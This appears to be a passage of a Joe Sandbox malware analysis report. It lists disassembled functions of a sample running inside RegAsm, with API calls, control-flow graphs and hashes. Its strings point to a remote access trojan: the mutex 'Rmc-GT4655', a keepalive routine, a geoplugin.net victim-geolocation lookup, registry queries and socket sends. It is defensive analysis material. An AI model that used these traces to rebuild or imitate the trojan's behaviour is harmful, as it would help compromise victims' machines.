                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                • __freea.LIBCMT ref: 0044AEB0
                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                • __freea.LIBCMT ref: 0044AEB9
                                                • __freea.LIBCMT ref: 0044AEDE
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                • String ID:
                                                • API String ID: 3864826663-0
                                                • Opcode ID: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                • Opcode Fuzzy Hash: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                Function 0041B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1552 41b411-41b454 call 4020df call 43bda0 InternetOpenW InternetOpenUrlW 1557 41b456-41b477 InternetReadFile 1552->1557 1558 41b479-41b499 call 4020b7 call 403376 call 401fd8 1557->1558 1559 41b49d-41b4a0 1557->1559 1558->1559 1560 41b4a2-41b4a4 1559->1560 1561 41b4a6-41b4b3 InternetCloseHandle * 2 call 43bd9b 1559->1561 1560->1557 1560->1561 1565 41b4b8-41b4c2 1561->1565
                                                APIs
                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                Strings
                                                • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                • String ID: http://geoplugin.net/json.gp
                                                • API String ID: 3121278467-91888290
                                                • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                Function 0041B354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1570 41b354-41b3ab call 41c048 call 4135e1 call 401fe2 call 401fd8 call 406b1c 1581 41b3ad-41b3d8 call 4135e1 call 401fab StrToIntA 1570->1581 1582 41b3ee-41b3f7 1570->1582 1592 41b3e6-41b3e9 call 401fd8 1581->1592 1593 41b3da-41b3e3 call 41cffa 1581->1593 1583 41b400 1582->1583 1584 41b3f9-41b3fe 1582->1584 1586 41b405-41b410 call 40537d 1583->1586 1584->1586 1592->1582 1593->1592
                                                APIs
                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                • API String ID: 782494840-2070987746
                                                • Opcode ID: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                • Opcode Fuzzy Hash: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                                Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1597 10008821-1000883a 1598 10008850-10008855 1597->1598 1599 1000883c-1000884c call 10009341 1597->1599 1601 10008862-10008886 MultiByteToWideChar 1598->1601 1602 10008857-1000885f 1598->1602 1599->1598 1606 1000884e 1599->1606 1604 10008a19-10008a2c call 10002ada 1601->1604 1605 1000888c-10008898 1601->1605 1602->1601 1607 1000889a-100088ab 1605->1607 1608 100088ec 1605->1608 1606->1598 1611 100088ca-100088db call 100056d0 1607->1611 1612 100088ad-100088bc call 1000bf20 1607->1612 1610 100088ee-100088f0 1608->1610 1614 100088f6-10008909 MultiByteToWideChar 1610->1614 1615 10008a0e 1610->1615 1611->1615 1622 100088e1 1611->1622 1612->1615 1625 100088c2-100088c8 1612->1625 1614->1615 1619 1000890f-10008921 call 10005f19 1614->1619 1620 10008a10-10008a17 call 10008801 1615->1620 1627 10008926-1000892a 1619->1627 1620->1604 1626 100088e7-100088ea 1622->1626 1625->1626 1626->1610 1627->1615 1629 10008930-10008937 1627->1629 1630 10008971-1000897d 1629->1630 1631 10008939-1000893e 1629->1631 1632 100089c9 1630->1632 1633 1000897f-10008990 1630->1633 1631->1620 1634 10008944-10008946 1631->1634 1637 100089cb-100089cd 1632->1637 1635 10008992-100089a1 call 1000bf20 1633->1635 1636 100089ab-100089bc call 100056d0 1633->1636 1634->1615 1638 1000894c-10008966 call 10005f19 1634->1638 1641 10008a07-10008a0d call 10008801 1635->1641 1649 100089a3-100089a9 1635->1649 1636->1641 1651 100089be 1636->1651 1637->1641 1642 100089cf-100089e8 call 10005f19 1637->1642 1638->1620 1653 1000896c 1638->1653 1641->1615 1642->1641 1654 100089ea-100089f1 1642->1654 1655 100089c4-100089c7 1649->1655 1651->1655 1653->1615 1656 100089f3-100089f4 1654->1656 1657 10008a2d-10008a33 1654->1657 1655->1637 1658 100089f5-10008a05 WideCharToMultiByte 1656->1658 1657->1658 1658->1641 1659 10008a35-10008a3c call 10008801 1658->1659 1659->1620
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                • __freea.LIBCMT ref: 10008A08
                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                • __freea.LIBCMT ref: 10008A11
                                                • __freea.LIBCMT ref: 10008A36
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                • String ID:
                                                • API String ID: 1414292761-0
                                                • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                Function 00415B25 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CountEventTick
                                                • String ID: !D@$NG
                                                • API String ID: 180926312-2721294649
                                                • Opcode ID: e277d64d27a4794d0741d7eac2fe64040eebd26b458680d9c5a88a7279e07c1c
                                                • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                • Opcode Fuzzy Hash: e277d64d27a4794d0741d7eac2fe64040eebd26b458680d9c5a88a7279e07c1c
                                                • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                Strings
                                                • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Create$EventLocalThreadTime
                                                • String ID: KeepAlive | Enabled | Timeout:
                                                • API String ID: 2532271599-1507639952
                                                • Opcode ID: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                                                • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                • Opcode Fuzzy Hash: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                                                • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                Function 004137AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                • RegCloseKey.KERNEL32(?), ref: 004137EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateValue
                                                • String ID: pth_unenc
                                                • API String ID: 1818849710-4028850238
                                                • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                • String ID:
                                                • API String ID: 3360349984-0
                                                • Opcode ID: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                                                • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                • Opcode Fuzzy Hash: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                                                • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                Function 1000C7E6 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: HandleModuleProtectVirtual
                                                • String ID:
                                                • API String ID: 2905821283-0
                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                Function 004485E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                Function 0041C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                                                • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseCreateHandleReadSize
                                                • String ID:
                                                • API String ID: 3919263394-0
                                                • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                Function 0040D0A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                • GetLastError.KERNEL32 ref: 0040D0BE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateErrorLastMutex
                                                • String ID: Rmc-GT4655
                                                • API String ID: 1925916568-2007630954
                                                • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                Function 1000C7A7 Relevance: 4.6, APIs: 3, Instructions: 100COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                  • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: HandleModuleProtectVirtual
                                                • String ID:
                                                • API String ID: 2905821283-0
                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                Function 00404AA1 Relevance: 4.6, APIs: 3, Instructions: 93synchronizationnetworkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EventObjectSingleWaitsend
                                                • String ID:
                                                • API String ID: 3963590051-0
                                                • Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                                                • Opcode Fuzzy Hash: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
                                                • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                                                Function 1000C803 Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 3519776433-0
                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                Function 004135E1 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                • RegQueryValueExA.KERNEL32 ref: 00413622
                                                • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
